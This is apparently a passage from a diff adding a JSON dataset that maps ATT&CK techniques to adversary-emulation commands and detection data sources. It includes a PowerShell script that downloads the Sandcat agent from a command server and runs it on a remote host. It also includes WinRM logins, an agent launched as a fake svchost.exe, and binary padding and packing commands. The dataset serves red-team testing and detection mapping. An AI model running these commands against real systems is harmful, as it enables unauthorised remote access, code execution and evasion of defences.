(ruby -v) {exit 0} else {exit 1}} catch {exit 1}", + "get_prereq_command": "Invoke-WebRequest -OutFile $env:Temp\\rubyinstaller-2.7.1-1-x64.exe https://github.com/oneclick/rubyinstaller2/releases/download/RubyInstaller-2.7.1-1/rubyinstaller-2.7.1-1-x64.exe\n$file1= $env:Temp + \"\\rubyinstaller-2.7.1-1-x64.exe\"\nStart-Process $file1 /S;" + }, + { + "description": "Computer must have Evil-WinRM installed", + "prereq_command": "try {if (evil-winrm -h) {exit 0} else {exit 1}} catch {exit 1}", + "get_prereq_command": "gem install evil-winrm" + } + ], + "executor": { + "command": "evil-winrm -i #{destination_address} -u #{user_name} -p #{password}", + "name": "powershell", + "elevation_required": true + } + } + ] + }, + { + "id": "3734aa1e-c536-42b3-8912-4c91b8bdce90", + "description": "Copy Sandcat file using PowerShell", + "name": "Copy Sandcat File using Powershell", + "tactic": "lateral-movement", + "technique": { + "attack_id": "T1021.006", + "name": "Remote Services: Windows Remote Management" + }, + "platforms": { + "windows": { + "psh": { + "command": "$server=\"#{server}\";\n$sharePath=\"#{share}\";\nSet-Location $sharePath;$url=\"$($server)/file/download\";\n$wc=New-Object System.Net.WebClient;$wc.Headers.add(\"platform\",\"windows\");\n$wc.Headers.add(\"file\",\"sandcat.go\");($data=$wc.DownloadData($url)) -and\n($name=$wc.ResponseHeaders[\"Content-Disposition\"].Substring($wc.ResponseHeaders[\"Content-Disposition\"].IndexOf(\"filename=\")+9).Replace(\"`\"\",\"\"))\n-and ([io.file]::WriteAllBytes(\"$($sharePath)$name.exe\",$data));\n$startServer=\"$($sharePath)$name.exe -server $($server) \";Invoke-Command\n-ScriptBlock {Param([string]$startServer, $sharePath, $name, $server) Invoke-WmiMethod\n-Class Win32_Process -Name Create -ArgumentList \"$($sharePath)$name.exe\n-server $server -v\" } -ComputerName #{remote.host.name} -ArgumentList $startServer, $sharePath, $name, $server\n", + "cleanup": "del sandcat.go-windows; Invoke-Command -ComputerName", + 
"payloads": [ + "sandcat.go-windows" + ] + } + } + }, + "singleton": true + }, + { + "id": "41bb2b7a-75af-49fd-bd15-6c827df25921", + "name": "Start Agent (WinRM)", + "description": "Start Agent using WinRM (WinRM)", + "tactic": "lateral-movement", + "technique": { + "attack_id": "T1021.006", + "name": "Remote Services: Windows Remote Management" + }, + "platforms": { + "windows": { + "psh": { + "command": "$username = \"#{domain.user.name}\";\n$password = \"#{domain.user.password}\";\n$secstr = New-Object -TypeName System.Security.SecureString;\n$password.ToCharArray() | ForEach-Object {$secstr.AppendChar($_)};\n$cred = New-Object -Typename System.Management.Automation.PSCredential -Argumentlist $username, $secstr;\n$session = New-PSSession -ComputerName #{remote.host.name} -Credential $cred;\nInvoke-Command -Session $session -ScriptBlock{start-job -scriptblock{cmd.exe /c start C:\\Users\\Public\\svchost.exe -server #{server} }};\nStart-Sleep -s 5;\nRemove-PSSession -Session $session;\n", + "cleanup": "$username = \"#{domain.user.name}\";\n$password = \"#{domain.user.password}\";\n$secstr = New-Object -TypeName System.Security.SecureString;\n$password.ToCharArray() | ForEach-Object {$secstr.AppendChar($_)};\n$cred = New-Object -Typename System.Management.Automation.PSCredential -Argumentlist $username, $secstr;\n$session = New-PSSession -ComputerName #{remote.host.name} -Credential $cred;\nInvoke-Command -Session $session -ScriptBlock{start-job -scriptblock{Get-Process cmd | Where-Object Path -eq C:\\Users\\Public\\svchost.exe | Stop-Process}};\nStart-Sleep -s 5;\nRemove-PSSession -Session $session;\n", + "payloads": [ + "sandcat.go-windows" + ] + } + } + }, + "singleton": true + } + ], + "queries": [], + "possible_detections": [ + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", 
+ "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "user", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "thread" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection to", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection to", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection from", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected to", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected to", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected from", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected to", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected to", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected from", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted to bind on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "bound to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "permitted listener on", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "permitted listener on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "permitted listener on", + "target_data_element": "process" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted to listen on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "listened on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked port bind on", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked port bind on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked port bind on", + "target_data_element": "process" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection to", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection to", + "target_data_element": "process" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection from", + "target_data_element": "process" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection to", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked listener on", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked listener on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked listener on", + "target_data_element": "process" + }, + { + "data_source": "logon session", + "definition": "Information about logon sessions being created or terminated by accounts (Local, Domain, or Cloud), interactively or over the network, in order to interact with network resources, applications, or services.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Google Workspace" + ], + "data_component": "logon session creation", + "description": "A logon session for a user was created.", + "source_data_element": "user", + "relationship": "created", + "target_data_element": "logon session" + }, + { + "data_source": "logon session", + "definition": "Information about logon sessions being created or terminated by accounts (Local, Domain, or Cloud), interactively or over the network, in 
order to interact with network resources, applications, or services.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Google Workspace" + ], + "data_component": "logon session creation", + "description": "A logon session for a user was created.", + "source_data_element": "user", + "relationship": "created logon session from", + "target_data_element": "ip" + }, + { + "data_source": "logon session", + "definition": "Information about logon sessions being created or terminated by accounts (Local, Domain, or Cloud), interactively or over the network, in order to interact with network resources, applications, or services.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Google Workspace" + ], + "data_component": "logon session creation", + "description": "A logon session for a user was created.", + "source_data_element": "user", + "relationship": "created logon session from", + "target_data_element": "port" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "user", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", 
+ "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "command" + } + ], + "external_reference": [ + [ + "https://docs.microsoft.com/en-us/windows/win32/procthread/processes-and-threads" + ], + null, + [ + "https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/basic-audit-logon-events" + ], + [ + "https://tools.ietf.org/id/draft-ietf-opsawg-tacacs-07.html#rfc.section.7.2", + "https://tools.ietf.org/html/rfc2866" + ] + ] + }, + { + "technique_id": "T1027.001", + "command_list": [ + "dd if=/dev/zero bs=1 count=1 >> /tmp/evil-binary\n" + ], + "commands": [ + { + "command": "dd if=/dev/zero bs=1 count=1 >> /tmp/evil-binary\n", + "source": "atomics/T1027.001/T1027.001.yaml", + "name": "Atomic Red Team Test - Obfuscated Files or Information: Binary Padding" + } + ], + "parsed_datasets": [ + { + "attack_technique": "T1027.001", + "display_name": "Obfuscated Files or Information: Binary Padding", + "atomic_tests": [ + { + "name": "Pad Binary to Change Hash - Linux/macOS dd", + "auto_generated_guid": "ffe2346c-abd5-4b45-a713-bf5f1ebd573a", + "description": "Uses dd to add a zero to the binary to change the hash.\n\nUpon successful execution, dd will modify `/tmp/evil-binary`, therefore the expected hash will change.\n", + "supported_platforms": [ + "macos", + "linux" + ], + "input_arguments": { + "file_to_pad": { + "description": "Path of binary to be padded", + "type": "Path", + "default": "/tmp/evil-binary" + } + }, + "dependency_executor_name": "bash", + "dependencies": [ + { + "description": "The binary must exist on disk at specified location (#{file_to_pad})\n", + "prereq_command": "if [ -f #{file_to_pad} ]; then exit 0; else exit 1; fi;\n", + "get_prereq_command": "cp /bin/ls #{file_to_pad}\n" + } + 
], + "executor": { + "command": "dd if=/dev/zero bs=1 count=1 >> #{file_to_pad}\n", + "cleanup_command": "rm #{file_to_pad}\n", + "name": "sh" + } + } + ] + } + ], + "queries": [], + "possible_detections": [ + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file metadata", + "description": "Data and information that describe a file and activity around it.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "file stream" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file metadata", + "description": "Data and information that describe a file and activity around it.", + "source_data_element": "process", + "relationship": "retrieved information about", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. 
This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file metadata", + "description": "Data and information that describe a file and activity around it.", + "source_data_element": "user", + "relationship": "retrieved information about", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file content", + "description": "Data contained in a file.", + "source_data_element": "process", + "relationship": "retrieved information about", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. 
This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file content", + "description": "Data contained in a file.", + "source_data_element": "user", + "relationship": "retrieved information about", + "target_data_element": "file" + } + ], + "external_reference": [ + [ + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-management", + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-streams", + "https://docs.microsoft.com/en-us/troubleshoot/windows-client/backup-and-storage/fat-hpfs-and-ntfs-file-systems" + ] + ] + }, + { + "technique_id": "T1027.002", + "command_list": [ + "cp PathToAtomicsFolder/T1027.002/bin/linux/test_upx /tmp/packed_bin && /tmp/packed_bin\n", + "cp PathToAtomicsFolder/T1027.002/bin/linux/test_upx_header_changed /tmp/packed_bin && /tmp/packed_bin\n", + "cp PathToAtomicsFolder/T1027.002/bin/darwin/test_upx /tmp/packed_bin && /tmp/packed_bin\n", + "cp PathToAtomicsFolder/T1027.002/bin/darwin/test_upx_header_changed /tmp/packed_bin && /tmp/packed_bin\n" + ], + "commands": [ + { + "command": "cp PathToAtomicsFolder/T1027.002/bin/linux/test_upx /tmp/packed_bin && /tmp/packed_bin\n", + "source": "atomics/T1027.002/T1027.002.yaml", + "name": "Atomic Red Team Test - Obfuscated Files or Information: Software Packing" + }, + { + "command": "cp PathToAtomicsFolder/T1027.002/bin/linux/test_upx_header_changed /tmp/packed_bin && /tmp/packed_bin\n", + "source": "atomics/T1027.002/T1027.002.yaml", + "name": "Atomic Red Team Test - Obfuscated Files or Information: Software Packing" + }, + { + "command": "cp PathToAtomicsFolder/T1027.002/bin/darwin/test_upx /tmp/packed_bin && /tmp/packed_bin\n", + "source": "atomics/T1027.002/T1027.002.yaml", + "name": "Atomic Red Team Test - Obfuscated Files or Information: Software Packing" + 
